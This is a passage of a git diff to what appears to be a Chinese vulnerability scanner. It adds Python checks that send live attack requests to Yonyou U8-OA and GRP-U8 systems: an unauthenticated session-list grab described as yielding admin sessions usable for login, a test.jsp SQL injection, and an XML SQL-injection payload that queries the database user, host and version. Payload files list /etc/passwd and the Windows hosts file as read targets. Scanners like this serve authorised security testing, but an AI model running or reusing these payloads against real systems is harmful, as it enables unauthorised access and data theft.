version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>' + }, + { + 'path': 'Proxy', + 'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>' + } + ] + def cnvd_2021_30167_scan(self, url): ''' 用友NC BeanShell远程命令执行漏洞 给了一个命令执行的页面, 在框框内输入命令, 然后点击按钮就可以运行任意代码 @@ -148,6 +199,155 @@ def yonyou_nc_fileRead_scan(self, url): } return results + def yonyou_u8_oa_getsession_scan(self, url): + ''' 通过该漏洞, 攻击者可以获取数据库中管理员的账户信息以及session, 可利用session登录相关账号 ''' + vul_info = {} + vul_info['app_name'] = self.app_name + 'U8-OA' + vul_info['vul_type'] = 'DSinfo' + vul_info['vul_id'] = 'Yonyou-u8-getSessionList-unAuth' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.yonyou_u8_oa_getsession_payloads: + path = payload['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + session_re = r'([0-9A-Z]{32})+' + if (re.search(session_re, res.text, re.M|re.U)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def yonyou_u8_oa_test_sqlinject_scan(self, url): + ''' 由于与致远OA使用相同的文件, 于是存在同样的漏洞 ''' + vul_info = {} + vul_info['app_name'] = self.app_name + 'U8-OA' + vul_info['vul_type'] = 'SQLinject' + vul_info['vul_id'] = 'Yonyou-u8-test.jsp-sqlinject' + vul_info['vul_method'] = 'GET' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.yonyou_u8_oa_test_sqlinject_payloads: + path = payload['path'] + target = url + path + + vul_info['path'] = path + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ('c4ca4238a0b923820dcc509a6f75849b' in res.text): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + + def cnnvd_201610_923_scan(self, url): + ''' + 用友GRP-u8存在XXE漏洞, 该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载, 导致可加载外部SQL语句 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + 'GRP-U8' + vul_info['vul_type'] = 'SQLinject/RCE' + vul_info['vul_id'] = 'CNNVD-201610-923' + vul_info['vul_method'] = 'POST' + vul_info['headers'] = {} + + # headers = self.headers.copy() + # headers.update(vul_info['headers']) + + for payload in self.cnnvd_201610_923_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=self.headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + version_re = r'column[1-4]{1}="Microsoft SQL Server \d{1,5} -.*Copyright.*Microsoft Corporation.*"' + + if (re.search(version_re, res.text, re.I|re.M|re.S|re.U)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + def addscan(self, url, vuln=None): if vuln: return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) @@ -155,6 +355,9 @@ def addscan(self, url, vuln=None): return [ thread(target=self.cnvd_2021_30167_scan, url=url), thread(target=self.yonyou_nc_fileRead_scan, url=url), + thread(target=self.yonyou_u8_oa_getsession_scan, url=url), + thread(target=self.yonyou_u8_oa_test_sqlinject_scan, url=url), + thread(target=self.cnnvd_201610_923_scan, url=url) ] yonyou = Yonyou() \ No newline at end of file diff --git a/payloads/demo.py b/payloads/demo.py index 3567287..21737f4 100644 --- a/payloads/demo.py +++ b/payloads/demo.py @@ -6,6 +6,7 @@ XXXXX 未开启强制路由RCE CNVD-2018-24942 file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts file:///C:\Windows\System32\drivers\etc\hosts ''' diff --git a/payloads/demo2.py b/payloads/demo2.py index d3fc0b0..ba06c7d 100644 --- a/payloads/demo2.py +++ b/payloads/demo2.py @@ -6,8 +6,8 @@ XXXXX 未开启强制路由RCE CNVD-2018-24942 file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts ''' from lib.api.dns import dns